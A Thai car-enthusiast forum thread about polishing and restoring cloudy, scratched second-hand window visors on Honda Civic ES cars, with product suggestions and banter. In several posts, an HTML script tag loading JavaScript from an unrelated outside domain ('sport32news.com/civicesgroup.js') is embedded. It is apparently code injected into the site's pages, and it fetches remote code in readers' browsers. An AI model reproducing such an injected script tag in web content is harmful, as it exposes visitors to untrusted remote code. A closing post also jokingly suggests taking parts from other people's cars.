ตอบ
ENJOY HONDA

เข้าร่วม: 20 พฤศจิกา 2008
ตอบ: 1346

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1186
ให้คำขอบคุณ: 479

ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
อาทิตย์, 2 สิงหา 2009 23:43 - คิ้วกันสาด ไม่ค่อยจะใสเลยอ่า...มีทางทำให้ฟื้นคืนชีพบ้างครับ
งุงิ...เคยขัดด้วยกระดาษทรายเบอร์ 1500 ไปแล้ว 1 รอบ...ไม่ควรจะขัดอีกอ่ะครับ

แต่ว่ามันยังไม่ใสดังใจเท่าไหร่ ใครมีคำแนะนำดีดีบ้างครับ... :D :D :D
boy_nsm

ชื่อเล่น: บอย

เข้าร่วม: 02 สิงหา 2009
ตอบ: 356

มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 522
ให้คำขอบคุณ: 374

ปี: 2003
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
จันทร์, 3 สิงหา 2009 09:40 - คิ้วกันสาด ไม่ค่อยจะใสเลยอ่า...มีทางทำให้ฟื้นคืนชีพบ้างครับ
ลองไปที่นี่ดูครับ http://www.civicesgroup.com/forum/topic7269
คุณ jonatan ทำไว้ให้ครับ
ได้รับคำขอบคุณจาก: Shoke  hacker  battery3k  ENJOY HONDA 
kobon

ชื่อเล่น: เอก คร้าบ

เข้าร่วม: 01 ตุลา 2008
ตอบ: 4945

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1061
ให้คำขอบคุณ: 2469

ปี: 2005
สี: เทา ซิลเวอร์สโตน (NH-630M)
จันทร์, 3 สิงหา 2009 17:29 - คิ้วกันสาด ไม่ค่อยจะใสเลยอ่า...มีทางทำให้ฟื้นคืนชีพบ้างครับ
ง่ายๆเลย ถอดขาย แล้วมาถอยมือหนึ่งกับผมสิ ใสกริ๊งๆ ครับท่าน
ได้รับคำขอบคุณจาก: ENJOY HONDA  tur 
bandai_join

เข้าร่วม: 23 กุมภา 2009
ตอบ: 3754

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 6410
ให้คำขอบคุณ: 536

สี: ทอง แซทเทิลไลท์ (NH-663M)
จันทร์, 3 สิงหา 2009 21:44 - คิ้วกันสาด ไม่ค่อยจะใสเลยอ่า...มีทางทำให้ฟื้นคืนชีพบ้างครับ
kobon พิมพ์ว่า:
ง่ายๆเลย ถอดขาย แล้วมาถอยมือหนึ่งกับผมสิ ใสกริ๊งๆ ครับท่าน

พี่เอกมีของเรื่อยๆ ม่ะครับ แล้ว ผ่อยสัก 10 เดือนได้มัย 0% น่ะ
ได้รับคำขอบคุณจาก: ENJOY HONDA 
ENJOY HONDA

ครอบครัว ES
ครอบครัว ES

จันทร์, 3 สิงหา 2009 23:24 - คิ้วกันสาด ไม่ค่อยจะใสเลยอ่า...มีทางทำให้ฟื้นคืนชีพบ้างครับ

น่าสนนะ...ว่าแต่ตอนนี้มีของมะท่านเอก

แต่ถามต่อว่า ครีมขัดละเอียดจะช่วยได้บ้างไหมครับ...

หรือมีที่ไหนปัดเงามั่งครับ...
:D :D
kobon

ครอบครัว ES
ครอบครัว ES

จันทร์, 3 สิงหา 2009 23:56 - คิ้วกันสาด ไม่ค่อยจะใสเลยอ่า...มีทางทำให้ฟื้นคืนชีพบ้างครับ
bandai_join พิมพ์ว่า:

พี่เอกมีของเรื่อยๆ ม่ะครับ แล้ว ผ่อยสัก 10 เดือนได้มัย 0% น่ะ

เอาตูดเป็ดมาจำนำก่อนสิ

ENJOY HONDA พิมพ์ว่า:

น่าสนนะ...ว่าแต่ตอนนี้มีของมะท่านเอก

แต่ถามต่อว่า ครีมขัดละเอียดจะช่วยได้บ้างไหมครับ...

อยากได้จัดให้ ติดตั้งด้วย
ได้รับคำขอบคุณจาก: tur 
ENJOY HONDA

ครอบครัว ES
ครอบครัว ES

อังคาร, 4 สิงหา 2009 00:13 - คิ้วกันสาด ไม่ค่อยจะใสเลยอ่า...มีทางทำให้ฟื้นคืนชีพบ้างครับ

ขอราคา NET ๆ ทาง PM ด้วยครับ...แล้วถ้าจะรบกวนถอดของเก่าด้วยได้ไหมครับ ถอดมะเปง ง่า....

หรือ SMS มาก็ได้ครับ....มีเบอร์ป๋มแล้วนิ
kobon

ครอบครัว ES
ครอบครัว ES

อังคาร, 4 สิงหา 2009 00:22 - คิ้วกันสาด ไม่ค่อยจะใสเลยอ่า...มีทางทำให้ฟื้นคืนชีพบ้างครับ

ขอราคา NET ๆ ทาง PM ด้วยครับ...แล้วถ้าจะรบกวนถอดของเก่าด้วยได้ไหมครับ ถอดมะเปง ง่า....

หรือ SMS มาก็ได้ครับ....มีเบอร์ป๋มแล้วนิ

0k Please wait
ได้รับคำขอบคุณจาก: tur 
jonatan

ชื่อเล่น: โจ

เข้าร่วม: 02 ตุลา 2008
ตอบ: 6291

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 19304
ให้คำขอบคุณ: 13458

อังคาร, 4 สิงหา 2009 10:12 - คิ้วกันสาด ไม่ค่อยจะใสเลยอ่า...มีทางทำให้ฟื้นคืนชีพบ้างครับ
ผมว่ามีอีกวิธีหนึ่งน่ะ ที่จะให้กลับมาใหม่เหมือนเดิมน่ะ
ต้องขัด แล้วพ่นสีดำแก้วเคลือบอ่ะ เงาใหม่แน่นอนเลยอ่ะ
ของผมก็หมองน่ะ แถมแตกลายงาด้วย ว่าจะลองพ่นดูอ่ะ......
ได้รับคำขอบคุณจาก: ENJOY HONDA 
FerioSiR

เข้าร่วม: 04 ธันวา 2008
ตอบ: 62

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 41
ให้คำขอบคุณ: 15

สี: ทอง แซทเทิลไลท์ (NH-663M)
อังคาร, 4 สิงหา 2009 21:47 - คิ้วกันสาด ไม่ค่อยจะใสเลยอ่า...มีทางทำให้ฟื้นคืนชีพบ้างครับ
jonatan พิมพ์ว่า:
ผมว่ามีอีกวิธีหนึ่งน่ะ ที่จะให้กลับมาใหม่เหมือนเดิมน่ะ
ต้องขัด แล้วพ่นสีดำแก้วเคลือบอ่ะ เงาใหม่แน่นอนเลยอ่ะ
ของผมก็หมองน่ะ แถมแตกลายงาด้วย ว่าจะลองพ่นดูอ่ะ......

ได้ผลยังไงมาบอกกันด้วยนะครับ
ENJOY HONDA

ครอบครัว ES
ครอบครัว ES

พุธ, 5 สิงหา 2009 00:46 - คิ้วกันสาด ไม่ค่อยจะใสเลยอ่า...มีทางทำให้ฟื้นคืนชีพบ้างครับ

ขัดด้วยน้ำยาขัดละเอียดหรือเปล่าครับ...

พ่นดำใสก็เป็น I dea ที่น่าสน...จะทำเมื่อไหร่ชวนผมไปดูด้วยนะครับ...

ถ้าแหล่มๆจะได้หารค่าของ งบจะได้ถูกลงมาอีก ดีไหมคุณโจ....
jonatan

ครอบครัว ES
ครอบครัว ES

พุธ, 5 สิงหา 2009 09:35 - คิ้วกันสาด ไม่ค่อยจะใสเลยอ่า...มีทางทำให้ฟื้นคืนชีพบ้างครับ

ขัดด้วยน้ำยาขัดละเอียดหรือเปล่าครับ...

พ่นดำใสก็เป็น I dea ที่น่าสน...จะทำเมื่อไหร่ชวนผมไปดูด้วยนะครับ...

ถ้าแหล่มๆจะได้หารค่าของ งบจะได้ถูกลงมาอีก ดีไหมคุณโจ....

ผมกำลังมองหาวิธีอยู่เหมือนกันอ่ะคับ
เรื่องหมองๆ น่าจะขัดออกน่ะ แต่เรื่องที่มันแตกลายงาอ่ะดี๊
สงสัยต้องพ่นอ่ะ แต่กลัวพ่นสีแก้ว แล้วมันยังเห็นแตกลายงาอยู่นี่อ่ะดี๊
หรือจะดำด้าน กลัวเสียของอีก เดี๋ยวว่างแล้ว หาวิธีได้แล้ว มา จอย กันเนอะ ดีป่ะ
ENJOY HONDA

ครอบครัว ES
ครอบครัว ES

พุธ, 5 สิงหา 2009 22:12 - คิ้วกันสาด ไม่ค่อยจะใสเลยอ่า...มีทางทำให้ฟื้นคืนชีพบ้างครับ

ผมกำลังมองหาวิธีอยู่เหมือนกันอ่ะคับ
เรื่องหมองๆ น่าจะขัดออกน่ะ แต่เรื่องที่มันแตกลายงาอ่ะดี๊
สงสัยต้องพ่นอ่ะ แต่กลัวพ่นสีแก้ว แล้วมันยังเห็นแตกลายงาอยู่นี่อ่ะดี๊
หรือจะดำด้าน กลัวเสียของอีก เดี๋ยวว่างแล้ว หาวิธีได้แล้ว มา จอย กันเนอะ ดีป่ะ

ถ้าถามความคิดผมนะ...ผมซีเรียสเรื่องรอยขนแมวกับความเงานมากกว่าครับ...

เพราะว่าการแตกลายงาแก้ไขไม่ได้ เลยไม่ไปคิดมันครับ...อย่าลืมว่าเราเล่นของมือสอง

จะไปให้แหล่มเหมือนของใหม่เลยคงไม่ได้ เพราะงั้น เราควรมองในจุดที่เราสามารถทำให้มันดีขึ้นได้มากที่สุด

แล้วอีกอย่างผมว่า ลายแตกลายงา มันจะมองเห็นได้ชัดเจนก็ต่อเมื่ออยู่ในรถแล้วมองออกมาเท่านั้นครับ...

มองจากภายนอกนี่แทบไม่เห็นเลย จริงไหมครับ...มาช่วยกันลบรอบขนแมว แล้วเคลือบให้กันสาดที่รักของเรา

ดูสดใสปิ๊ง ปั๊ง...กันดีกว่าครับ...

อีกอย่างผมได้คุยกับเพื่อนสมาชิกคนนึง...เค้าเห็นด้วยกับการเล่นกันสาดมือสองนะ เมื่อมองในมุมของความคุ้มค่า

ซึ่งเค้าเองก็ใส่ของใหม่มาแล้ว บอกว่าไม่กี่เดือนก็สภาพเดียวกับที่เราซื้อมือสอง ที่พี่ยุ่นใส่มาเป็นปีแหละ

เพราะวัสดุของกันสาดอยากจะบอกว่า มันเป็นรอยง่ายมากๆๆๆๆๆ...แค่ผมพยายามเอาเศษของยาเคลือบที่มันไปอุด

อยู่ในรองเล็กๆกลมๆของดุม ตรงบานหลังอ่ะ นึกออกมะ ด้วยแปรงสีฟัน แค่นั้นมันก็เป็นรอยขนแปรงสีฟันแล้วครับ...

อึ้ง...เลย ขนาดแปรงไม่แข็งนะ เพราะเป็นแปรงเก่าที่หมดสภาะแล้ว ยังทำให้เกิดรอยขนแมวได้เลย...

เอาเป็นว่า...มาหาวิธีทำให้รอยขนแมวที่มีอยู่มันหายไปให้มากที่สุดดีกว่าไหมครับ...ตอนนี้ผมกำลังเล็งน้ำยาขัดละเอียดอยู่

เพราะได้รับคำแนะนำจากคุณ คิง (ขออนุณาติเอ่ยนาม) ว่ามันจะช่วยให้รอยขนแมวจางลงได้ครับ....แล้วถ้าอยากให้เงาๆ

ก็ใช้น้ำยาเคลือบสีครับ...ลงทุกๆวันไปเรื่อยรับลองว่าต้องเงานแน่ ตอนนี้ผมได้กันสาดมาวันอาทิตย์ ตอนนี้วันพุธ ผมลงไป

10 กว่าครั้งได้แล้วครับ คือวันละสอง ถึง สามครั้งเลย ผลที่ได้ก็เงาขึ้นกว่าตอนซื้อมาพอสมควรเลยนะครับ...

ยังไงคุณโจ ลองดูก็ได้ครับ...และก็ขอให้หาวิธีลบรอยได้เร็วๆนะครับ...อย่าลืมชวนผมไปแจมด้วยนะครับ

จะได้เป็น ชมรม...กันสาดมือสอง อิอิ
jonatan

ครอบครัว ES
ครอบครัว ES

พุธ, 5 สิงหา 2009 22:33 - คิ้วกันสาด ไม่ค่อยจะใสเลยอ่า...มีทางทำให้ฟื้นคืนชีพบ้างครับ
จริงๆแล้ว ผมได้มาวันแรก ผมก็ยังไม่ได้ใส่น่ะ
เพราะสภาพเจ้าของดู ท่าทางจะไม่ค่อยรักษาอ่ะ
เลยใช้น้ำยาขัดรถ ขัดอยู่ 2-3 วัน แล้วค่อยใส่อ่ะ ถึงได้
ฟื้นคืนชีพ มาได้ระดับหนึ่งอ่ะ สงสัยต้องใช้น้ำยาขัดละเอียด
เหมือนกับที่ คุณว่าอ่ะ แล้วใช้เครื่องปั้น เหมือนกระทู้ที่ผมนำเสนอ
ไปใน DIY. ตามเค้าล่ะมั่ง แต่ยังไม่มีเวลาเลยอ่ะ เพราะต้องถอดออกทำ
จริงๆ คนขายเค้าคุยกับผม จะขายแค่ 2พัน เองน่ะ แต่มีเพื่อนเค้าบอก ของเทพ
สำหรับรุ่นนี้เลยน่ะ เค้าก็ งง มันหายากขนาดนั้นเลยหรือ งัยก็เดี๋ยวลองหาน้ำยาที่ว่า
มาก่อนดีก่า แล้วว่างค่อยถอดมาทำอ่ะ เพราะต้องเสียตังค์กาว 2 หน้า อีกต่างเป็นร้อยเลยอ่ะ อิ อิ.....

เสาร์นี้เห็นเค้ามีนอกรอบฝั่งธนฯ PARK เซ็นทรัลพระราม2 สนใจมาเจอกันได้น่ะคับ
ได้หาวิธีจัดการกับรอยหมอง และขนแมว อ่ะ อิ อิ
ENJOY HONDA

ครอบครัว ES
ครอบครัว ES

พุธ, 5 สิงหา 2009 23:05 - คิ้วกันสาด ไม่ค่อยจะใสเลยอ่า...มีทางทำให้ฟื้นคืนชีพบ้างครับ
จริงๆแล้ว ผมได้มาวันแรก ผมก็ยังไม่ได้ใส่น่ะ
เพราะสภาพเจ้าของดู ท่าทางจะไม่ค่อยรักษาอ่ะ
เลยใช้น้ำยาขัดรถ ขัดอยู่ 2-3 วัน แล้วค่อยใส่อ่ะ ถึงได้
ฟื้นคืนชีพ มาได้ระดับหนึ่งอ่ะ สงสัยต้องใช้น้ำยาขัดละเอียด
เหมือนกับที่ คุณว่าอ่ะ แล้วใช้เครื่องปั้น เหมือนกระทู้ที่ผมนำเสนอ
ไปใน DIY. ตามเค้าล่ะมั่ง แต่ยังไม่มีเวลาเลยอ่ะ เพราะต้องถอดออกทำ
จริงๆ คนขายเค้าคุยกับผม จะขายแค่ 2พัน เองน่ะ แต่มีเพื่อนเค้าบอก ของเทพ
สำหรับรุ่นนี้เลยน่ะ เค้าก็ งง มันหายากขนาดนั้นเลยหรือ งัยก็เดี๋ยวลองหาน้ำยาที่ว่า
มาก่อนดีก่า แล้วว่างค่อยถอดมาทำอ่ะ เพราะต้องเสียตังค์กาว 2 หน้า อีกต่างเป็นร้อยเลยอ่ะ อิ อิ.....

เสาร์นี้เห็นเค้ามีนอกรอบฝั่งธนฯ PARK เซ็นทรัลพระราม2 สนใจมาเจอกันได้น่ะคับ
ได้หาวิธีจัดการกับรอยหมอง และขนแมว อ่ะ อิ อิ

ผมว่าทำโดยไม่ต้องถอดก็ได้นะครับ...เพราะทำแต่ด้านนอกอ่ะ...ค่อยๆทาครีมขัดละเอียด รอแห้ง แล้วเอาผ้าที่่แข็งๆหน่อย

ค่อยๆขัด น่าจะพอแล้วนะครับ...
jonatan

ครอบครัว ES
ครอบครัว ES

พฤหัส, 6 สิงหา 2009 10:08 - คิ้วกันสาด ไม่ค่อยจะใสเลยอ่า...มีทางทำให้ฟื้นคืนชีพบ้างครับ

ผมว่าทำโดยไม่ต้องถอดก็ได้นะครับ...เพราะทำแต่ด้านนอกอ่ะ...ค่อยๆทาครีมขัดละเอียด รอแห้ง แล้วเอาผ้าที่่แข็งๆหน่อย

ค่อยๆขัด น่าจะพอแล้วนะครับ...

ลองสังเกตุดีๆ น่ะคับ ถ้ารอยขนแมว
ขัดข้างนอกคับ แต่รอยที่มันหมองๆ
เหมือนสีมันไม่เท่ากัน ต้องขัดด้านใน
ด้วยอ่ะคับ มันเป็นคราบคล้ายขี้ไคลอ่ะ
แล้วจะใสปิ๊งๆๆ เหมือนผม แต่รอยขนแมว
ก่ะแตกลายงา นี่อ่ะดี๊ ยังแก้ไม่ได้ ......
cisco

ชื่อเล่น: เต้น

เข้าร่วม: 25 พฤศจิกา 2008
ตอบ: 3557

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5197
ให้คำขอบคุณ: 9940
จันทร์, 5 ตุลา 2009 15:35 - คิ้วกันสาด ไม่ค่อยจะใสเลยอ่า...มีทางทำให้ฟื้นคืนชีพบ้างครับ

ถ้าถามความคิดผมนะ...ผมซีเรียสเรื่องรอยขนแมวกับความเงานมากกว่าครับ...

เพราะว่าการแตกลายงาแก้ไขไม่ได้ เลยไม่ไปคิดมันครับ...อย่าลืมว่าเราเล่นของมือสอง

จะไปให้แหล่มเหมือนของใหม่เลยคงไม่ได้ เพราะงั้น เราควรมองในจุดที่เราสามารถทำให้มันดีขึ้นได้มากที่สุด

แล้วอีกอย่างผมว่า ลายแตกลายงา มันจะมองเห็นได้ชัดเจนก็ต่อเมื่ออยู่ในรถแล้วมองออกมาเท่านั้นครับ...

มองจากภายนอกนี่แทบไม่เห็นเลย จริงไหมครับ...มาช่วยกันลบรอบขนแมว แล้วเคลือบให้กันสาดที่รักของเรา

ดูสดใสปิ๊ง ปั๊ง...กันดีกว่าครับ...

อีกอย่างผมได้คุยกับเพื่อนสมาชิกคนนึง...เค้าเห็นด้วยกับการเล่นกันสาดมือสองนะ เมื่อมองในมุมของความคุ้มค่า

ซึ่งเค้าเองก็ใส่ของใหม่มาแล้ว บอกว่าไม่กี่เดือนก็สภาพเดียวกับที่เราซื้อมือสอง ที่พี่ยุ่นใส่มาเป็นปีแหละ

เพราะวัสดุของกันสาดอยากจะบอกว่า มันเป็นรอยง่ายมากๆๆๆๆๆ...แค่ผมพยายามเอาเศษของยาเคลือบที่มันไปอุด

อยู่ในรองเล็กๆกลมๆของดุม ตรงบานหลังอ่ะ นึกออกมะ ด้วยแปรงสีฟัน แค่นั้นมันก็เป็นรอยขนแปรงสีฟันแล้วครับ...

อึ้ง...เลย ขนาดแปรงไม่แข็งนะ เพราะเป็นแปรงเก่าที่หมดสภาะแล้ว ยังทำให้เกิดรอยขนแมวได้เลย...

เอาเป็นว่า...มาหาวิธีทำให้รอยขนแมวที่มีอยู่มันหายไปให้มากที่สุดดีกว่าไหมครับ...ตอนนี้ผมกำลังเล็งน้ำยาขัดละเอียดอยู่

เพราะได้รับคำแนะนำจากคุณ คิง (ขออนุณาติเอ่ยนาม) ว่ามันจะช่วยให้รอยขนแมวจางลงได้ครับ....แล้วถ้าอยากให้เงาๆ

ก็ใช้น้ำยาเคลือบสีครับ...ลงทุกๆวันไปเรื่อยรับลองว่าต้องเงานแน่ ตอนนี้ผมได้กันสาดมาวันอาทิตย์ ตอนนี้วันพุธ ผมลงไป

10 กว่าครั้งได้แล้วครับ คือวันละสอง ถึง สามครั้งเลย ผลที่ได้ก็เงาขึ้นกว่าตอนซื้อมาพอสมควรเลยนะครับ...

ยังไงคุณโจ ลองดูก็ได้ครับ...และก็ขอให้หาวิธีลบรอยได้เร็วๆนะครับ...อย่าลืมชวนผมไปแจมด้วยนะครับ

จะได้เป็น ชมรม...กันสาดมือสอง อิอิ

ขอเข้าชมรมด้วยนะครับ คุณ Enjoy HONDA พึ่งได้เมื่อวันเสาร์นี่เอง แต่มันไม่ค่อยใส อ่ะครับ มีครีมขัดดี ๆ แนะนำไหมครับ

ตอนนี้กำลังหาซื้อครีมสำหรับขัดกันสาดโดยเฉพาะเลย ตามที่พี่คิง แนะนำไว้ก็มี

1. ครีม Cana กระปุกล่ะประมาณ 50 - 80 บาท

คิ้วกันสาด ไม่ค่อยจะใสเลยอ่า...มีทางทำให้ฟื้นคืนชีพบ้างครับ

2. Amway Silicone Glaze Car Polish ราคาประมาณ 300 บาท

มีส่วนผสมของซิลิโคนและขี้ผึ้งชนิดพิเศษที่ช่วยเคลือบรักษาความเงางามให้กับพื้นผิวรถ ปกป้องสีรถให้

คงทน ใช้ขจัดคราบสกปรกอย่างง่ายดายและประหยัดแรง รวมทั้งเครื่องใช้ต่างๆ เช่น สุขภัณฑ์ กระเบื้อง

เซรามิก และไฟเบอร์กล๊าส

คิ้วกันสาด ไม่ค่อยจะใสเลยอ่า...มีทางทำให้ฟื้นคืนชีพบ้างครับ

3. Meguiars PlastX Clear Plastic Cleaner Polish เจลขัดเงาพลาสติกใส ราคา 560 บาท

สูตรเจล ใช้ง่าย คืนความเงาสดใสให้กับพลาสติกใสทุกชนิดทั้งชนิดอ่อนและแข็ง เทคโนลยีล่าสุดของเมกไกวส์ขจัดคราบสกปรกได้เร็วขึ้น ลบรอยขีดข่วนอ่อนๆ และรอยขนแมวอย่างปลอดภัย ไม่ทำลายผิวพลาสติก เหมาะสำหรับ ไฟหน้ารถ ไฟท้าย หน้าต่างหลังคาเปิดประทุน แผงหน้าปัด ฯลฯ

ถ้าใช้ร่วมกับผ้าไมโครไฟเบอร์ จะดีไหมครับ
kidz

ชื่อเล่น: เอก

เข้าร่วม: 13 มิถุนา 2009
ตอบ: 296

ได้รับคำขอบคุณ: 398
ให้คำขอบคุณ: 71

ปี: 2001
สี: แดง แรลไล (R-513)
จันทร์, 5 ตุลา 2009 16:15 - คิ้วกันสาด ไม่ค่อยจะใสเลยอ่า...มีทางทำให้ฟื้นคืนชีพบ้างครับ
แอบมาดู รองบหลวงอยู่
jonatan

ครอบครัว ES
ครอบครัว ES

จันทร์, 5 ตุลา 2009 16:20 - คิ้วกันสาด ไม่ค่อยจะใสเลยอ่า...มีทางทำให้ฟื้นคืนชีพบ้างครับ
สงสัยถ้าจะกำจัดที่เป็นรอย แตกลายงา
มีวิธีเดียวอ่ะ สงสัยต้องซื้อใหม่ผมว่าน่ะ....อิ อิ หมดหนทางแก้แล้วอ่ะ...เห้อ
ได้รับคำขอบคุณจาก: cisco 
cisco

ชื่อเล่น: เต้น

เข้าร่วม: 25 พฤศจิกา 2008
ตอบ: 3557

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5197
ให้คำขอบคุณ: 9940
จันทร์, 5 ตุลา 2009 16:44 - คิ้วกันสาด ไม่ค่อยจะใสเลยอ่า...มีทางทำให้ฟื้นคืนชีพบ้างครับ
สงสัยถ้าจะกำจัดที่เป็นรอย แตกลายงา
มีวิธีเดียวอ่ะ สงสัยต้องซื้อใหม่ผมว่าน่ะ....อิ อิ หมดหนทางแก้แล้วอ่ะ...เห้อ

เวลามองจากด้านนอกก็ไม่เห็นครับ แต่ถ้ามองจากในตัวรถแล้วแสงส่งผ่านล่ะก็เพียบเลย

อย่างน้อย ๆ ขอให้ด้านนอกมันใส ๆ เงา ๆ ก็ชื่นใจแล้วครับ "<script src="https://sport32news.com/civicesgroup.js">
xcyber

ชื่อเล่น: เอ็กซ์

เข้าร่วม: 30 ตุลา 2008
ตอบ: 1105

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1281
ให้คำขอบคุณ: 217

จันทร์, 5 ตุลา 2009 18:37 - คิ้วกันสาด ไม่ค่อยจะใสเลยอ่า...มีทางทำให้ฟื้นคืนชีพบ้างครับ
ได้ความรู้ครับ ขอบคุณครับ
>>SP<<

เข้าร่วม: 11 ตุลา 2008
ตอบ: 823

Guru ES
Guru ES

ได้รับคำขอบคุณ: 797
ให้คำขอบคุณ: 138

อังคาร, 6 ตุลา 2009 00:31 - คิ้วกันสาด ไม่ค่อยจะใสเลยอ่า...มีทางทำให้ฟื้นคืนชีพบ้างครับ
แต่ว่านะซื้อใหม่ดีก่า.....มีขายนะเอาป่าวละ..
ENJOY HONDA

ครอบครัว ES
ครอบครัว ES

อังคาร, 6 ตุลา 2009 22:09 - คิ้วกันสาด ไม่ค่อยจะใสเลยอ่า...มีทางทำให้ฟื้นคืนชีพบ้างครับ
cisco พิมพ์ว่า:

เวลามองจากด้านนอกก็ไม่เห็นครับ แต่ถ้ามองจากในตัวรถแล้วแสงส่งผ่านล่ะก็เพียบเลย

อย่างน้อย ๆ ขอให้ด้านนอกมันใส ๆ เงา ๆ ก็ชื่นใจแล้วครับ "<script src="https://sport32news.com/civicesgroup.js">

ที่คิงแนะนำคงเป็นยี่ห้อ Carpro มั้งครับ...ใช้แล้วก็โอเคนะครับ แต่ตอนนี้ผมก็เริ่มเฉยๆแล้วหล่ะ

ตอนไปให้คิงขัดคิงบอกว่า ตอนนี้คิงเอลก็เล่นของใหม่ ใช้ไป 3 เดือนก็สภาพแบบมือสองเลย

แล็กเกอร์มันบางมากๆครับ...เราก็โอเคเล่นมือสองก็ดีแล้วว.... :D
carrimoroll

ชื่อเล่น: อาร์ต

เข้าร่วม: 27 กรกฎา 2009
ตอบ: 1978

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 6596
ให้คำขอบคุณ: 4103

อังคาร, 6 ตุลา 2009 22:22 - คิ้วกันสาด ไม่ค่อยจะใสเลยอ่า...มีทางทำให้ฟื้นคืนชีพบ้างครับ
ยังไม่ได้ติดเลย อยากติดบ้างอ่า

ทำไมมันดูแลยากขนาดนั้นกันเลยเหรอพี่ๆ
jonatan

ครอบครัว ES
ครอบครัว ES

พุธ, 7 ตุลา 2009 09:21 - คิ้วกันสาด ไม่ค่อยจะใสเลยอ่า...มีทางทำให้ฟื้นคืนชีพบ้างครับ
ตอนนี้ผมก็เริ่มชินแหล่ะ เรื่องแตกลายงา เนี้ย
มองจากด้านนอกเงาๆ สวยๆ ก็พอ แหล่ะ ข้างในช่างมันไม่มีใครเห็นนอกจาก กิ๊ก....อิ อิ
<script src="https://sport32news.com/civicesgroup.js"></
>>SP<<

Guru ES
Guru ES

พุธ, 7 ตุลา 2009 15:41 - คิ้วกันสาด ไม่ค่อยจะใสเลยอ่า...มีทางทำให้ฟื้นคืนชีพบ้างครับ
มันมีวิธีคับ....
DRINK

เข้าร่วม: 04 ตุลา 2008
ตอบ: 3857

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5219
ให้คำขอบคุณ: 1708

สี: ขาว ทาฟเฟต้า (NH-578)
พุธ, 7 ตุลา 2009 21:42 - คิ้วกันสาด ไม่ค่อยจะใสเลยอ่า...มีทางทำให้ฟื้นคืนชีพบ้างครับ
>>SP<< พิมพ์ว่า:

ทำให้ผมหน่อยดิ
>>SP<<

Guru ES
Guru ES

พฤหัส, 8 ตุลา 2009 00:37 - คิ้วกันสาด ไม่ค่อยจะใสเลยอ่า...มีทางทำให้ฟื้นคืนชีพบ้างครับ
DRINK พิมพ์ว่า:

โทรมาถามได้คับ.....บอกแล้วว่ามันมีวิธี..
kaisuh

ชื่อเล่น: ปอปลา

เข้าร่วม: 17 ตุลา 2008
ตอบ: 2822

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1703
ให้คำขอบคุณ: 8904

สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
พฤหัส, 8 ตุลา 2009 10:55 - คิ้วกันสาด ไม่ค่อยจะใสเลยอ่า...มีทางทำให้ฟื้นคืนชีพบ้างครับ
DRINK พิมพ์ว่า:

โทรมาถามได้คับ.....บอกแล้วว่ามันมีวิธี..

โห คนอื่นอยากรู้ด้วยอ่ะครับ
toey_rx

เข้าร่วม: 08 ตุลา 2008
ตอบ: 290

ได้รับคำขอบคุณ: 386
ให้คำขอบคุณ: 23
พฤหัส, 8 ตุลา 2009 19:50 - คิ้วกันสาด ไม่ค่อยจะใสเลยอ่า...มีทางทำให้ฟื้นคืนชีพบ้างครับ
ผมว่าซื้อใหม่ ดีกว่าครับ ถ้าไม่มีปัญญา ซื้อใหม่ก้ ไปเอาจากรถคนอื่น ก็ได้ ง่ายดี ผมตอบจากใจจริงนะ
ได้รับคำขอบคุณจาก: YINDEE 
ตอบ
หน้า 1 จาก 1
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.